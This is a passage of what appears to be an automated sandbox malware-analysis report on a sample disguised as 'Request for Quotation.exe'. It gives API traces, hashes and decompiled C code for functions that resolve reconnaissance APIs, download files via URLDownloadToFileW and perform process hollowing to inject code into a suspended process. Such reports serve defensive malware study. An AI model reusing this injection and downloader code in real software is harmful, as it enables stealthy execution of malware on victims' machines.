                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                                                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D73
                                                                                • CharNextA.USER32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D84
                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 190613189-0
                                                                                • Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                                • Instruction ID: 0c063e539c4a2d6313fdce3eb9328f18231664df77b923cface8765f2046746d
                                                                                • Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                                • Instruction Fuzzy Hash: 0AF0F632104914FFCB02DFA4DD04D9FBBA8EF46350B2580BAE840F7220D634DE019BA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Analysis Process: Request for Quotation.exe PID: 612 Parent PID: 7164 Request for Quotation.exeCOMMON

                                                                                Executed Functions

                                                                                Function 0040D2A6, Relevance: 210.9, APIs: 117, Strings: 3, Instructions: 868sleepfilenetworkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D2BC
                                                                                • SetEvent.KERNEL32(?), ref: 0040D2C5
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D2CE
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6D195DF0), ref: 0040D2E8
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040D2F9
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D308
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • GetTickCount.KERNEL32 ref: 0040D33C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,?,?,00000000), ref: 0040D39C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000,?,?,00000000), ref: 0040D3AC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000,?,?,00000000), ref: 0040D3BC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000,?,?,00000000), ref: 0040D3CC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,00000000,?,?), ref: 0040D3DC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040D3E6
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004C), ref: 0040D402
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D40E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D41A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D426
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D432
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D43E
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D44A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D456
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D462
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D474
                                                                                • atoi.MSVCRT ref: 0040D47B
                                                                                • Sleep.KERNEL32(00000064), ref: 0040DD60
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 0040DD83
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DD95
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DDB0
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040DDBB
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,00000000), ref: 0040DDDD
                                                                                • URLDownloadToFileW.URLMON(00000000,00000000), ref: 0040DDE5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DDF9
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040DE0D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@CountD@1@@DownloadEventFileSleepTickV01@atoi
                                                                                • String ID: $$PowrProf.dll$SetSuspendState
                                                                                • API String ID: 2465730144-1158640710
                                                                                • Opcode ID: 2d3800b21f02be87d81d1f3b08866a964c080d7525b95067cc5a73a19eea0ae7
                                                                                • Instruction ID: 8b97f5ae68acd249977ecc05ae4d1582f654e66521c0ff460722a1e21975d306
                                                                                • Opcode Fuzzy Hash: 2d3800b21f02be87d81d1f3b08866a964c080d7525b95067cc5a73a19eea0ae7
                                                                                • Instruction Fuzzy Hash: D8529372900208EBDB04BBB1EC59AEE7768EF54305F10487EF512A70E2DF785A54CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409908, Relevance: 75.3, APIs: 26, Strings: 17, Instructions: 92libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00409908() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t22;

				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
				 *0x41bc94 = _t2;
				if(_t2 == 0) {
					 *0x41bc94 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x41bc90 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x41bc94 == 0) {
					 *0x41bc90 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x41bca0 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x41c1e4 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x41c1e8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x41bc98 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
				 *0x41bcd0 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x41bca4 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x41bc78 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x41bca8 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t22 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x41bc9c = _t22;
				return _t22;
			}






                                                                                0x0040991b
                                                                                0x00409924
                                                                                0x0040992c
                                                                                0x00409933
                                                                                0x00409944
                                                                                0x00409944
                                                                                0x0040995f
                                                                                0x00409964
                                                                                0x00409975
                                                                                0x00409975
                                                                                0x00409993
                                                                                0x004099a7
                                                                                0x004099bb
                                                                                0x004099cf
                                                                                0x004099e3
                                                                                0x004099f7
                                                                                0x00409a0b
                                                                                0x00409a1c
                                                                                0x00409a24
                                                                                0x00409a28
                                                                                0x00409a2e

                                                                                APIs
                                                                                • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,0041BA38,0041BCB0,00000000,00408F24,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040991B
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00409924
                                                                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040993F
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00409942
                                                                                • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409953
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00409956
                                                                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409970
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00409973
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409984
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00409987
                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409998
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040999B
                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099AC
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004099AF
                                                                                • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099C0
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004099C3
                                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099D4
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004099D7
                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099E8
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004099EB
                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099FC
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004099FF
                                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A10
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00409A13
                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A21
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00409A24
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule$LibraryLoad
                                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$user32
                                                                                • API String ID: 551388010-2914448473
                                                                                • Opcode ID: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                                                                • Instruction ID: 4c9355c828fc4da35060c465c8423d7dda30a1a04bb52c9e9a5aad065eac730d
                                                                                • Opcode Fuzzy Hash: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                                                                • Instruction Fuzzy Hash: F721AFB0E81358B9DA206BB56C4EFDB7E59DA94B54323442BB40893194EFBCC480CEDC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F219, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 157injectionthreadmemoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 92%
                                                                                			E0040F219() {
				void* _t59;
				void* _t60;
				int _t64;
				CONTEXT* _t65;
				int _t66;
				int _t70;
				void* _t71;
				void* _t72;
				int _t73;
				signed int _t74;
				int _t79;
				CONTEXT* _t80;
				int _t81;
				long _t82;
				intOrPtr _t85;
				intOrPtr* _t93;
				signed int _t95;
				void* _t100;
				CONTEXT* _t110;
				struct _PROCESS_INFORMATION* _t114;
				void* _t115;
				void* _t117;

				L00413ECA();
				 *((intOrPtr*)(_t115 - 0x10)) = _t117 - 0x70;
				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
				 *((intOrPtr*)(_t115 - 0x78)) = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
				_t59 =  *(_t115 + 0xc);
				 *(_t115 - 0x74) = _t59;
				if( *_t59 != 0x5a4d) {
					L16:
					 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
					_t60 = 0;
				} else {
					_t93 =  *((intOrPtr*)(_t59 + 0x3c)) + _t59;
					 *((intOrPtr*)(_t115 - 0x18)) = _t93;
					if( *_t93 != 0x4550) {
						goto L16;
					} else {
						_t95 = 0x11;
						memset(_t115 - 0x60, 0, _t95 << 2);
						_t114 =  *(_t115 + 0x10);
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t64 = CreateProcessW(0,  *(_t115 + 8), 0, 0, 0, 4, 0, 0, _t115 - 0x60, _t114); // executed
						if(_t64 == 0) {
							goto L16;
						} else {
							_t65 = VirtualAlloc(0, 4, 0x1000, 4); // executed
							_t110 = _t65;
							 *(_t115 - 0x70) = _t110;
							_t110->ContextFlags = 0x10007;
							_t66 = GetThreadContext(_t114->hThread, _t110); // executed
							if(_t66 == 0) {
								goto L16;
							} else {
								_t70 = ReadProcessMemory(_t114->hProcess, _t110->Ebx + 8, _t115 - 0x1c, 4, 0); // executed
								if(_t70 == 0) {
									goto L16;
								} else {
									_t71 =  *(_t115 - 0x1c);
									if(_t71 ==  *(_t93 + 0x34)) {
										NtUnmapViewOfSection(_t114->hProcess, _t71);
									}
									_t72 = VirtualAllocEx(_t114->hProcess,  *(_t93 + 0x34),  *(_t93 + 0x50), 0x3000, 0x40); // executed
									 *(_t115 - 0x6c) = _t72;
									if(_t72 == 0) {
										goto L16;
									} else {
										_t73 = WriteProcessMemory(_t114->hProcess, _t72,  *(_t115 + 0xc),  *(_t93 + 0x54), 0); // executed
										if(_t73 == 0) {
											goto L16;
										} else {
											_t74 = 0;
											 *(_t115 - 0x64) = 0;
											while(_t74 < ( *(_t93 + 6) & 0x0000ffff)) {
												_t100 =  *(_t115 + 0xc);
												_t85 =  *((intOrPtr*)(_t100 + 0x3c)) + (_t74 + _t74 * 4) * 8 + _t100 + 0xf8;
												 *((intOrPtr*)(_t115 - 0x68)) = _t85;
												WriteProcessMemory(_t114->hProcess,  *((intOrPtr*)(_t85 + 0xc)) +  *(_t115 - 0x6c),  *((intOrPtr*)(_t85 + 0x14)) + _t100,  *(_t85 + 0x10), 0); // executed
												 *(_t115 - 0x64) =  *(_t115 - 0x64) + 1;
												_t74 =  *(_t115 - 0x64);
											}
											_t79 = WriteProcessMemory( *_t114,  *(_t115 - 0x70)->Ebx + 8, _t93 + 0x34, 4, 0); // executed
											if(_t79 == 0) {
												goto L16;
											} else {
												_t80 =  *(_t115 - 0x70);
												_t80->Eax =  *((intOrPtr*)(_t93 + 0x28)) +  *(_t115 - 0x6c);
												_t81 = SetThreadContext(_t114->hThread, _t80); // executed
												if(_t81 == 0) {
													goto L16;
												} else {
													_t82 = ResumeThread(_t114->hThread); // executed
													if(_t82 == 0xffffffff) {
														goto L16;
													} else {
														_t60 = 1;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t115 - 0xc));
				return _t60;
			}

























                                                                                0x0040f21e
                                                                                0x0040f229
                                                                                0x0040f22c
                                                                                0x0040f247
                                                                                0x0040f24a
                                                                                0x0040f24d
                                                                                0x0040f255
                                                                                0x0040f3c7
                                                                                0x0040f3c7
                                                                                0x0040f3cb
                                                                                0x0040f25b
                                                                                0x0040f25e
                                                                                0x0040f260
                                                                                0x0040f269
                                                                                0x00000000
                                                                                0x0040f26f
                                                                                0x0040f271
                                                                                0x0040f277
                                                                                0x0040f279
                                                                                0x0040f27e
                                                                                0x0040f27f
                                                                                0x0040f280
                                                                                0x0040f281
                                                                                0x0040f294
                                                                                0x0040f29c
                                                                                0x00000000
                                                                                0x0040f2a2
                                                                                0x0040f2ac
                                                                                0x0040f2b2
                                                                                0x0040f2b4
                                                                                0x0040f2b7
                                                                                0x0040f2c1
                                                                                0x0040f2c9
                                                                                0x00000000
                                                                                0x0040f2cf
                                                                                0x0040f2e3
                                                                                0x0040f2eb
                                                                                0x00000000
                                                                                0x0040f2f1
                                                                                0x0040f2f1
                                                                                0x0040f2f7
                                                                                0x0040f2fc
                                                                                0x0040f2fc
                                                                                0x0040f30e
                                                                                0x0040f314
                                                                                0x0040f319
                                                                                0x00000000
                                                                                0x0040f31f
                                                                                0x0040f330
                                                                                0x0040f334
                                                                                0x00000000
                                                                                0x0040f33a
                                                                                0x0040f33a
                                                                                0x0040f33c
                                                                                0x0040f33f
                                                                                0x0040f34a
                                                                                0x0040f353
                                                                                0x0040f35a
                                                                                0x0040f371
                                                                                0x0040f373
                                                                                0x0040f376
                                                                                0x0040f376
                                                                                0x0040f392
                                                                                0x0040f396
                                                                                0x00000000
                                                                                0x0040f398
                                                                                0x0040f39e
                                                                                0x0040f3a1
                                                                                0x0040f3ab
                                                                                0x0040f3b3
                                                                                0x00000000
                                                                                0x0040f3b5
                                                                                0x0040f3b8
                                                                                0x0040f3c1
                                                                                0x00000000
                                                                                0x0040f3c3
                                                                                0x0040f3c3
                                                                                0x0040f3c3
                                                                                0x0040f3c1
                                                                                0x0040f3b3
                                                                                0x0040f396
                                                                                0x0040f334
                                                                                0x0040f319
                                                                                0x0040f2eb
                                                                                0x0040f2c9
                                                                                0x0040f29c
                                                                                0x0040f269
                                                                                0x0040f3d0
                                                                                0x0040f3db

                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040F21E
                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,73BCF560), ref: 0040F23A
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040F241
                                                                                • CreateProcessW.KERNELBASE ref: 0040F294
                                                                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004,?,00000000,73BCF560), ref: 0040F2AC
                                                                                • GetThreadContext.KERNELBASE(?,00000000,?,00000000,73BCF560), ref: 0040F2C1
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F2E3
                                                                                • NtUnmapViewOfSection.NTDLL(?,?,?,00000000,73BCF560), ref: 0040F2FC
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,?,00000000,73BCF560), ref: 0040F30E
                                                                                • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?,00000000,73BCF560), ref: 0040F330
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000000,73BCF560), ref: 0040F371
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F392
                                                                                • SetThreadContext.KERNELBASE(?,?,?,00000000,73BCF560), ref: 0040F3AB
                                                                                • ResumeThread.KERNELBASE(?,?,00000000,73BCF560), ref: 0040F3B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResumeSectionUnmapView
                                                                                • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                • API String ID: 2881453444-1050664331
                                                                                • Opcode ID: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                                                                • Instruction ID: 14082434b540fb9a952e0d1072ae94245c422bc39d8110babfce67740ad62d51
                                                                                • Opcode Fuzzy Hash: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                                                                • Instruction Fuzzy Hash: 0E513A71A00204EFDB219F64CC85FAABBB9FF84710F20407AE914EB2A1D775E815CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402580, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66timethreadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 37%
                                                                                			E00402580(void* __ecx, intOrPtr _a4, intOrPtr _a8, char _a11) {
				struct _SYSTEMTIME _v20;
				char _v36;
				void* _v52;
				char* _t25;
				char* _t26;
				intOrPtr _t35;
				void* _t37;

				_t37 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x38)) != 0) {
					__eflags = 0;
					return 0;
				}
				_t35 = _a4;
				if(_a8 != 0) {
					__eflags =  *0x41bcac; // 0x0
					if(__eflags != 0) {
						GetLocalTime( &_v20);
						_t25 =  &_a11;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t25, "KeepAlive Enabled! Timeout: %i seconds\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff, _t35);
						_t26 =  &_v36;
						L00414170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t26, _t25);
						printf(_t26);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					}
				} else {
					 *((char*)(__ecx + 0x44)) = 1;
				}
				 *((char*)(_t37 + 0x38)) = 1;
				 *((intOrPtr*)(_t37 + 0x3c)) = _t35;
				CreateThread(0, 0, E004027A2, _t37, 0, 0); // executed
				return 1;
			}










                                                                                0x00402588
                                                                                0x0040258f
                                                                                0x0040262f
                                                                                0x00000000
                                                                                0x0040262f
                                                                                0x00402599
                                                                                0x0040259c
                                                                                0x004025a4
                                                                                0x004025aa
                                                                                0x004025b0
                                                                                0x004025ce
                                                                                0x004025dc
                                                                                0x004025e3
                                                                                0x004025e7
                                                                                0x004025f1
                                                                                0x004025f8
                                                                                0x00402604
                                                                                0x0040260d
                                                                                0x0040260d
                                                                                0x0040259e
                                                                                0x0040259e
                                                                                0x0040259e
                                                                                0x0040261d
                                                                                0x00402621
                                                                                0x00402624
                                                                                0x00000000

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?,00000001,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025B0
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,0000000A,?,00000000,?,0000000A), ref: 004025DC
